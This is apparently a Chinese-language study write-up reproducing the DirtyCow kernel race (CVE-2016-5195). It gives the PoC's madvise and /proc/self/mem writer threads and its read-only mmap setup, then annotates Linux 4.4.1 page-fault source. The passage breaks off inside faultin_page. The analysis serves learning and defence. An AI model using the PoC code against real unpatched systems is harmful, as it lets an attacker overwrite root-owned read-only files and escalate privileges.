CVE-2016-5195-Dirtycow

前言

一直想学习Linux内核的相关知识却没有动身,偶然间在看雪发现了一篇复现脏牛的帖子linux內核提权漏洞CVE-2016-5195,写的非常详细,并且一直听说过脏牛提权的漏洞,借此机会跟着复现并且好好深入学习一下内核相关知识,恶补一下我这不扎实的基础,由于此前没怎么接触过内核相关知识及代码,因此做一个详细的笔记,方便以后查阅。

环境搭建

环境采用qemu+busybox+linux-4.4.1主要参考两篇文章搭建Linux kernel调试环境以及QEMU + Busybox 模拟 Linux 内核环境

这两篇文章关于如何搭建环境已经解释的很详细了,我这里就不在阐述。

主要是记录一下搭建环境时候遇到的问题

  • 想要执行DirtyCow的exp,编译busybox后,需要挂载相应的文件系统,否则exp会执行不了,这里可以用一下ctf kernel题目的文件系统。
  • 使用qemu启动时可以选择把cpu的个数设置为1,方便调试,否则会调试到一半跳转到其他进程-smp cores=1,threads=1
  • 关于linux内核编译时的优化,由于编译时的优化使得调试时不太方便,代码也会跳来跳去,因此需要将优化给关闭,但是直接修改Makefile文件将-O2修改为-O0,编译时会报错,因为内核的部分代码依赖于编译器的优化,这里找到了解决办法Is it possible to turn off the gcc optimization when compiling kernel?,我们可以找到需要调试的模块,并修改该模块下的Makefile,例如将内核中read_write函数的优化关闭,可以在Makefile文件下添加CFLAGS_read_write.o = -O0,再编译即可或在函数前加__attribute__((optimize("O0")))

调试环境

  • ubuntu 16.04
  • Linux-4.4.1
  • qemu-system-x86_64 2.5.0

漏洞验证

文件fooroot权限的只读文件,但是利用脏牛漏洞,可以将数据1111写入到只读文件中

image-20230101163821643

漏洞分析

poc作为切入点,分析漏洞成因

首先poc定义了两个线程以及这两个线程需要执行的操作,其中一个线程操作如madviseThread,不断执行madvise函数,该函数的参数MADV_DONTNEED旨在通知内核,map指定的地址内存短时间内不再访问,因此该线程做的具体操作就是不断的丢弃map地址指向的内存页。

1
2
3
4
5
6
7
8
9
10
11
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}

另一个线程的操作是procselfmemThread,该函数会访问内存空间,并找到map地址指向的内存,并且不断地写入数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;

int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}

最后就是poc需要指定一个需要写入的只读文件,poc首先以只读权限打开目标文件,接着利用mmap函数将文件映射到进程空间中去,接着结合上述两个线程的操作,一个线程不断丢弃map指向的内存页,而另一个线程则不断地向map地址指向地内存页写入输入,那么在某一时刻发生了条件竞争则会导致往只读文件写入恶意数据。完成对只读文件写入的操作。

1
2
3
4
5
6
7
...
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
...

在使用mmap函数将文件映射到内存的时,并没有完成虚拟地址向物理地址映射的过程,当对该地址进行写入操作时会触发缺页异常。整个缺页处理的流程是通过内核函数follow_page_maskfaultin_page函数处理完成的,具体流程如下

(1)第一次进入follow_page_mask,由于没有建立物理页,因此会直接通过no_page_table函数返回

image-20230101165753546

(2)由于没有找到对应的页表,则进入缺页错误处理函数中,进行物理页的建立

image-20230101170006311

(3)进入faultin_page函数进行缺页处理,由于需要对该内存页进行写操作(procselfmemThread线程执行的操作),因此需要将FAULT_FLAG_WRITE标志位标记上,因为进程在映射文件的时候是只读映射,但是需要对这块内存进行写入操作,因此内核会用FAULT_FLAG_WRITE进行标记,这个标志位就是导致漏洞发生的关键点。

image-20230101170224478

(3)接着会进入handle_mm_fault函数,这个函数就会内存对应的物理页生成好,返回给用户进行写入操作。

image-20230101170539003

(4)这里介绍一下在handle_mm_falut函数内部会遇到三个函数的选择,分别是do_read_faultdo_cow_fault以及 do_shared_fault函数,由于poc使用mmap映射文件到内存的时候并有没有选择共享模式进行映射,因此不会进入do_shared_fault函数内部的流程,那么do_read_faultdo_cow_fault函数会怎么选择呢?这里涉及写时复制的操作,若进程对该内存只有读操作,那么内核会直接将内存对应的物理页返回给进程进行读操作,而进程对该内存需要进行写操作时候,由于不能影响原先物理内存的信息,此时内核会选择将该内存对应的物理页进行拷贝操作得到一个物理页的副本,将这个副本交给进程,那么进程就可以随意改写并且不会影响原始物理页的信息。那么如何判断进程是否有写的意图,从代码上可以看到,取决于FAULT_FLAG_WRITE这个标志位。

image-20230101171200414

(5)那么继续回到handle_mm_fault函数,这个函数就是经过一系列操作返回一个供进程写的物理页,但是返回的物理页不具有写的权限,因此会直接返回0。

image-20230101172732897

(6)则会第二次进入follow_page_mask函数,由于进程需要内存也也进行写操作,但是返回的内存页不能写,那么需要再一次进入faultin_page函数进行处理

image-20230101173158606

(7)第二次faultin_page函数后,handle_mm_fault函数则会返回一个可写的物理页

image-20230101173443506

(8)由于已经返回了可写的物理页,那么FOLL_WRITE标志位就可以清空了,这里是漏洞利用条件竞争想发生的时间点

image-20230101173521394

(9)第三次进入follow_page_mask函数,可以发现此时终于获得了物理页地址

image-20230101173811280

这里总结一些缺页流程,需要经过三次follow_page_mask函数以及两次faultin_page函数

  • 第一次follow_page_mask由于没有找到内存对应的物理页因此无法获取,则需要进入faultin_page函数进行缺页处理

  • 第一次faultin_page函数建立了内存页对应的物理页,但是该物理页不具有可写权限。

  • 第二次follow_page_mask,由于物理页不可写,直接返回。

  • 第二次faultin_page,返回可写的物理页,将FOLL_WRITE标志位清除

  • 第三次follow_page_mask,获得了可写的物理页,继续进行后续操作。

漏洞点

在进行第二次faultin_page时,FOLL_WRITE标志位被清除,madviseThread线程操作刚好执行,那么会将建立好的映射清空,那么流程进入到follow_page_mask会发现没法获取对应的物理页,则会继续进入faultin_page函数进行缺页处理,但是此时已经没有FOLL_WRITE标志位了,那么内核就会认为进程不会对该内存空间进行写操作,那么就会进入do_read_fault函数的流程,会将只读文件对应的物理页直接返回,那么后续的改写操作都会在这个物理页进行操作,从而导致只读文件被改写。

源码审计

  • sys_write函数本质是调用了内核的SYSCALL_DEFINE3(write,unsigned int,fd,const char __user *,buf,size_t,count)

linux-4.4.1/include/linux/syscalls.h:182

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#ifdef CONFIG_FTRACE_SYSCALLS
...
#else
#define SYSCALL_METADATA(sname, nb, ...)
#endif

#define SYSCALL_DEFINE0(sname) \ //没有参数的系统调用
SYSCALL_METADATA(_##sname, 0); \
asmlinkage long sys_##sname(void)
#define SYSCALL_DEFINE1(name, ...) SYSCALL_DEFINEx(1, _##name, __VA_ARGS__) //一个参数的系统调用
#define SYSCALL_DEFINE2(name, ...) SYSCALL_DEFINEx(2, _##name, __VA_ARGS__) //两个参数的系统调用
#define SYSCALL_DEFINE3(name, ...) SYSCALL_DEFINEx(3, _##name, __VA_ARGS__) //三个参数的系统调用
#define SYSCALL_DEFINE4(name, ...) SYSCALL_DEFINEx(4, _##name, __VA_ARGS__) //四个参数的系统调用
#define SYSCALL_DEFINE5(name, ...) SYSCALL_DEFINEx(5, _##name, __VA_ARGS__) //五个参数的系统调用
#define SYSCALL_DEFINE6(name, ...) SYSCALL_DEFINEx(6, _##name, __VA_ARGS__) //六个参数的系统调用

#define SYSCALL_DEFINEx(x, sname, ...) \
SYSCALL_METADATA(sname, x, __VA_ARGS__) \ //当没有定义CONFIG_FTRACE_SYSCALLS时,SYSCALL_METADATA(sname, x, __VA_ARGS__)的宏定义为空值
__SYSCALL_DEFINEx(x, sname, __VA_ARGS__) //将...以__VA_ARGS__替换

#define __PROTECT(...) asmlinkage_protect(__VA_ARGS__) // asmlinkage_protect(__VA_ARGS__)的宏定义为 do{ }while(0)
#define __SYSCALL_DEFINEx(x, name, ...) \
asmlinkage long sys##name(__MAP(x,__SC_DECL,__VA_ARGS__)) \
__attribute__((alias(__stringify(SyS##name)))); \ //设置别名,sys_write等同于SyS_write
static inline long SYSC##name(__MAP(x,__SC_DECL,__VA_ARGS__)); \ //_MAP()则是将参数拼接起来
asmlinkage long SyS##name(__MAP(x,__SC_LONG,__VA_ARGS__)); \
asmlinkage long SyS##name(__MAP(x,__SC_LONG,__VA_ARGS__)) \ //Sys_write内部调用了SYSC_write
{ \
long ret = SYSC##name(__MAP(x,__SC_CAST,__VA_ARGS__)); \
__MAP(x,__SC_TEST,__VA_ARGS__); \
__PROTECT(x, ret,__MAP(x,__SC_ARGS,__VA_ARGS__)); \
return ret; \
} \
static inline long SYSC##name(__MAP(x,__SC_DECL,__VA_ARGS__))

linux-4.4.1/include/linux/syscalls.h:92

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#define __MAP0(m,...)
#define __MAP1(m,t,a) m(t,a)
#define __MAP2(m,t,a,...) m(t,a), __MAP1(m,__VA_ARGS__)
#define __MAP3(m,t,a,...) m(t,a), __MAP2(m,__VA_ARGS__)
#define __MAP4(m,t,a,...) m(t,a), __MAP3(m,__VA_ARGS__)
#define __MAP5(m,t,a,...) m(t,a), __MAP4(m,__VA_ARGS__)
#define __MAP6(m,t,a,...) m(t,a), __MAP5(m,__VA_ARGS__)
#define __MAP(n,...) __MAP##n(__VA_ARGS__) //n代表参数的个数

#define __SC_DECL(t, a) t a //将两个参数直接拼接起来,即t为类型,a为变量名,例如__SE_DECL(int,x) = int x
#define __TYPE_IS_L(t) (__same_type((t)0, 0L))
#define __TYPE_IS_UL(t) (__same_type((t)0, 0UL))
#define __TYPE_IS_LL(t) (__same_type((t)0, 0LL) || __same_type((t)0, 0ULL))
#define __SC_LONG(t, a) __typeof(__builtin_choose_expr(__TYPE_IS_LL(t), 0LL, 0L)) a
#define __SC_CAST(t, a) (t) a
#define __SC_ARGS(t, a) a
#define __SC_TEST(t, a) (void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(t) && sizeof(t) > sizeof(long))

linux-4.4.1/include/linux/stringify.h

1
2
3
4
5
6
7
8
9
10
11
12
13
#ifndef __LINUX_STRINGIFY_H
#define __LINUX_STRINGIFY_H

/* Indirect stringification. Doing two levels allows the parameter to be a
* macro itself. For example, compile with -DFOO=bar, __stringify(FOO)
* converts to "bar".
*/

#define __stringify_1(x...) #x
#define __stringify(x...) __stringify_1(x) //__stringify(a) = "a"

#endif /* !__LINUX_STRINGIFY_H */

linux-4.4.1/include/linux/linkage.h

1
2
3
4
5
#ifndef __ASSEMBLY__
#ifndef asmlinkage_protect
# define asmlinkage_protect(n, ret, args...) do { } while (0)
#endif
#endif

根据上述内核代码,SYSCALL_DEFINE3(write,unsigned int,fd,const char __user *,buf,size_t,count)的宏替换过程为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
SYSCALL_DEFINE3(write,unsigned int,fd,const char __user *,buf,size_t,count)
-->
SYSCALL_DEFINEx(3, _write, unsigned int,fd,const char __user *,buf,size_t,count)
-->
asmlinkage long sys_write(unsigned int fd,const char__user *buf,size_t count)
__attribute__((alias("SyS_write"))); //sys_write设置别名为SyS_write
static inline long SYSC_write(unsigned int fd,const char__user *buf,size_t count);
asmlinkage long SyS_write(unsigned int fd,const char__user *buf,size_t count);
asmlinkage long SyS_write(unsigned int fd,const char__user *buf,size_t count) \
{ \
long ret = SYSC_write(unsigned int fd,const char__user *buf,size_t count); \
(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(unsigned int) && sizeof(unsigned int) > sizeof(long)),(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(const char__user *) && sizeof(const char__user *) > sizeof(long))
(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(size_t) && sizeof(size_t) > sizeof(long)); \
do { } while (0); \
return ret; \
} \
static inline long SYSC_write(unsigned int fd,const char__user *buf,size_t count)

因此SYSCALL_DEFINE3(write,unsigned int,fd,const char __user *,buf,size_t,count)编译后的结果是sys_write(uunsigned int fd,const char __user * buf,size_t count)

sys_write函数调用流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
entry_SYSCALL_64(arch/x86/entry/entry_64.S:185)
->
SyS_write(fs/read_write.c:577)
->
SYSC_write(fs/read_write.c:585)
->
vfs_write(fs/read_write.c:538)
->
__vfs_write(fs/read_write.c:489)
->
mem_write(fs/proc/base.c:908)
->
mem_rw(fs/proc/base.c:908)
->
access_remote_vm(mm/memory.c:3722)
->
__access_remote_vm(mm/memory.c:3662)
->
get_user_pages(mm/gup.c:859)
->
__get_user_pages_locked(mm/gup.c:651)
->
__get_user_pages(mm/gup.c:457)
->
follow_page_mask(mm/gup.c+180) and faultin_page(mm/gup.c+303)
->
handle_mm_fault(mm/memory.c+3424)
->
__handle_mm_fault(mm/memory.c+3339)
->
handle_pte_fault(mm/memory.c+3287)

SyS_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
struct fd f = fdget_pos(fd); //根据文件描述符获取对应的文件
ssize_t ret = -EBADF; //#define EBADF 9 /* Bad file number */

if (f.file) {
loff_t pos = file_pos_read(f.file); //loff_t为long long类型,读取文件位置
ret = vfs_write(f.file, buf, count, &pos);//以pos位置为起点写入文件,写入内容为buf,写入字节数为count
if (ret >= 0)
file_pos_write(f.file, pos);
fdput_pos(f);
}

return ret;
}

vfs_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;

if (!(file->f_mode & FMODE_WRITE)) //判断是否可写
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))//判断是否有写函数
return -EINVAL; //#define EINVAL 22 /* Invalid argument */
if (unlikely(!access_ok(VERIFY_READ, buf, count))) //判断写入的字符是否超过了用户态的缓冲区空间,即大于0x7ffffffff000
return -EFAULT; //#define EFAULT 14 /* Bad address */

ret = rw_verify_area(WRITE, file, pos, count); //判断所在区域是否可写
if (ret >= 0) {
count = ret;
file_start_write(file);
ret = __vfs_write(file, buf, count, pos);
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
}

return ret;
}

__vfs_write

1
2
3
4
5
6
7
8
9
10
ssize_t __vfs_write(struct file *file, const char __user *p, size_t count,
loff_t *pos)
{
if (file->f_op->write)
return file->f_op->write(file, p, count, pos); //根据写入文件类型选择相应的写入函数,这里是mem_write
else if (file->f_op->write_iter)
return new_sync_write(file, p, count, pos);
else
return -EINVAL;
}

mem_write

1
2
3
4
5
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1); //mem_write实际上是对mem_rw函数的封装
}

mem_rw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
struct mm_struct *mm = file->private_data;//私有数据
unsigned long addr = *ppos;//写入地址
ssize_t copied;
char *page;

if (!mm)
return 0;

page = (char *)__get_free_page(GFP_TEMPORARY); //获取空闲页
if (!page)
return -ENOMEM;

copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users))
goto free;

while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE); //取两者之间更小的值

if (write && copy_from_user(page, buf, this_len)) { //将用户态缓存区数据先拷贝的页
copied = -EFAULT;
break;
}

this_len = access_remote_vm(mm, addr, page, this_len, write); //跨进程写操作
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}

if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}

buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;

mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}

access_remote_vm

1
2
3
4
5
6
7
8
9
10
11
12
13
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
/*
mm = mm
addr = addr
buf = page
len = this_len
write = write
*/
//access_remote_vm(mm, addr, page, this_len, write);
return __access_remote_vm(NULL, mm, addr, buf, len, write); //access_remote_vm内部封装了__access_remote_vm函数
}

__access_remote_vm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)//NULL,mm为file->private_data,addr为写入的地址,buf为page,len为长度,write为写标志位
{
/*
tsk = NULL
mm = file->private_data
addr = addr
buf = page
len = this_len
write = write
*/
struct vm_area_struct *vma; //虚拟内存的结构体
void *old_buf = buf; //old_buf = page

down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
/*
tsk = NULL
mm = file->private_data
addr = addr
1
write = write
1
page = NULL
vma = NULL
*/
ret = get_user_pages(tsk, mm, addr, 1,
write, 1, &page, &vma); //获取需要写入的物理页,漏洞点存在于此,如果我们获取了文件实际的物理页,那么就可以完成任意文件写的操作
if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;

maddr = kmap(page); //将高端页帧长期映射(作为持久映射)到内核地址空间中
if (write) { //若需要写入
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);//即将上一个进程的page内的内容写入刚刚获取的物理里
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page); //释放物理页
page_cache_release(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);

return buf - old_buf;
}

get_user_pages

1
2
3
4
5
6
7
long get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages, int write,
int force, struct page **pages, struct vm_area_struct **vmas)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false, FOLL_TOUCH);//get_user_pages内部封装了__get_user_pages_locked
}

__get_user_pages_locked

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
int write, int force,
struct page **pages,
struct vm_area_struct **vmas,
int *locked, bool notify_drop,
unsigned int flags)
{
/*
__get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false, FOLL_TOUCH);
tsk = NULL
mm = file->private_data
start = addr
nr_pages = 1
write = write
force = 1
page = NULL
vmas = NULL
locked = NULL
notify_drop = false
flags = FOLL_TOUCH
*/
long ret, pages_done;
bool lock_dropped;

if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}

if (pages)
flags |= FOLL_GET; //需要获取页
if (write)
flags |= FOLL_WRITE; //PTE可写
if (force)
flags |= FOLL_FORCE; //具有可读/写权限

pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
if (!locked)
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret; //直接返回

/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}

if (!pages)
/* If it's a prefault don't insist harder */
return ret;

if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/* VM_FAULT_RETRY didn't trigger */
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;

/*
* Repeat on the address that fired VM_FAULT_RETRY
* without FAULT_FLAG_ALLOW_RETRY but with
* FAULT_FLAG_TRIED.
*/
*locked = 1;
lock_dropped = true;
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (notify_drop && lock_dropped && *locked) {
/*
* We must let the caller know we temporarily dropped the lock
* and so the critical section protected by it was lost.
*/
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}

__get_user_pages

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
...
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current))) //用以捕获信号
return i ? i : -ERESTARTSYS;
cond_resched(); //进行进程调度,主动释放权限
/*
第一次follow_page_mask,由于没有分配页表因此返回0,即page = 0,进入faultin_page,参数foll_flags的值为0x17,nonblocking值为0
进入handle_mm_fault,fault_flags为1
进入__handle__mm_fault,此时pte已经分配好,但是还没有与物理页进行映射
进入handle_pte_fault,将pte与物理页进行映射
进入do_fault函数对pte表进行处理
进入do_cow_fault进行写时复制处理
进入__do_fault

*/
page = follow_page_mask(vma, start, foll_flags, &page_mask); //获取页
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags, //页中断处理
nonblocking);
switch (ret) {
case 0:
goto retry;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;
start += page_increm * PAGE_SIZE;
nr_pages -= page_increm;
} while (nr_pages);
return i;
}

follow_page_mask

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
struct page *follow_page_mask(struct vm_area_struct *vma,
unsigned long address, unsigned int flags,
unsigned int *page_mask)
{ //根据虚拟地址查找对应的物理页
//pgd->pud->pmd->ptl->pte
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
spinlock_t *ptl;
struct page *page;
struct mm_struct *mm = vma->vm_mm;

*page_mask = 0;

page = follow_huge_addr(mm, address, flags & FOLL_WRITE); //判断是否为huag page
if (!IS_ERR(page)) {
BUG_ON(flags & FOLL_GET);
return page;
}

pgd = pgd_offset(mm, address); //获取pgd对应的目录项
if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
return no_page_table(vma, flags);
/*
* 011111110 | 110110010 | 1000 0011 1 | 0111 1010 0 | 000000000000
* 9 | 9 | 9 | 9 | 12|
*/
pud = pud_offset(pgd, address); //获取pud对应的表项
if (pud_none(*pud)) //判断pud对应的表项是否为空
return no_page_table(vma, flags);
if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) { //判断是不是hug的页表
page = follow_huge_pud(mm, address, pud, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if (unlikely(pud_bad(*pud)))
return no_page_table(vma, flags);

pmd = pmd_offset(pud, address); //获取pmd项
if (pmd_none(*pmd))
return no_page_table(vma, flags);
if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
page = follow_huge_pmd(mm, address, pmd, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
return no_page_table(vma, flags);
if (pmd_trans_huge(*pmd)) { //从hugb page中分割物理页
if (flags & FOLL_SPLIT) {
split_huge_page_pmd(vma, address, pmd);
return follow_page_pte(vma, address, pmd, flags);
}
ptl = pmd_lock(mm, pmd); //获取ptl项
if (likely(pmd_trans_huge(*pmd))) {
if (unlikely(pmd_trans_splitting(*pmd))) {
spin_unlock(ptl);
wait_split_huge_page(vma->anon_vma, pmd);
} else {
page = follow_trans_huge_pmd(vma, address,
pmd, flags);
spin_unlock(ptl);
*page_mask = HPAGE_PMD_NR - 1;
return page;
}
} else
spin_unlock(ptl);
}
return follow_page_pte(vma, address, pmd, flags);
}

follow_page_pte

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
struct mm_struct *mm = vma->vm_mm;
struct page *page;
spinlock_t *ptl;
pte_t *ptep, pte;

retry:
if (unlikely(pmd_bad(*pmd))) //判断页表是否可以访问等权限
return no_page_table(vma, flags);

ptep = pte_offset_map_lock(mm, pmd, address, &ptl); //取出页框
pte = *ptep;
if (!pte_present(pte)) { //判断pte内是否为空
swp_entry_t entry;
/*
* KSM's break_ksm() relies upon recognizing a ksm page
* even while it is being migrated, so for that case we
* need migration_entry_wait().
*/
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
if (pte_none(pte))
goto no_page;
entry = pte_to_swp_entry(pte);
if (!is_migration_entry(entry))
goto no_page;
pte_unmap_unlock(ptep, ptl);
migration_entry_wait(mm, pmd, address);
goto retry;
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}

page = vm_normal_page(vma, address, pte); //通过address与pte找到物理页
if (unlikely(!page)) {
if (flags & FOLL_DUMP) {
/* Avoid special (like zero) pages in core dumps */
page = ERR_PTR(-EFAULT);
goto out;
}

if (is_zero_pfn(pte_pfn(pte))) {
page = pte_page(pte);
} else {
int ret;

ret = follow_pfn_pte(vma, address, ptep, flags);
page = ERR_PTR(ret);
goto out;
}
}

if (flags & FOLL_GET)
get_page_foll(page);
if (flags & FOLL_TOUCH) {
if ((flags & FOLL_WRITE) &&
!pte_dirty(pte) && !PageDirty(page))
set_page_dirty(page);
/*
* pte_mkyoung() would be more correct here, but atomic care
* is needed to avoid losing the dirty bit: it is easier to use
* mark_page_accessed().
*/
mark_page_accessed(page); //标记页被访问
}
if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
/*
* The preliminary mapping check is mainly to avoid the
* pointless overhead of lock_page on the ZERO_PAGE
* which might bounce very badly if there is contention.
*
* If the page is already locked, we don't need to
* handle it now - vmscan will handle it later if and
* when it attempts to reclaim the page.
*/
if (page->mapping && trylock_page(page)) {
lru_add_drain(); /* push cached pages to LRU */
/*
* Because we lock page here, and migration is
* blocked by the pte's page reference, and we
* know the page is still mapped, we don't even
* need to check for file-cache page truncation.
*/
mlock_vma_page(page);
unlock_page(page);
}
}
out:
pte_unmap_unlock(ptep, ptl);
return page; //将物理页返回
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
}

faultin_page

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
struct mm_struct *mm = vma->vm_mm;
unsigned int fault_flags = 0;
int ret;

/* mlock all present pages, but do not fault in new pages */
if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
return -ENOENT;
/* For mm_populate(), just skip the stack guard page. */
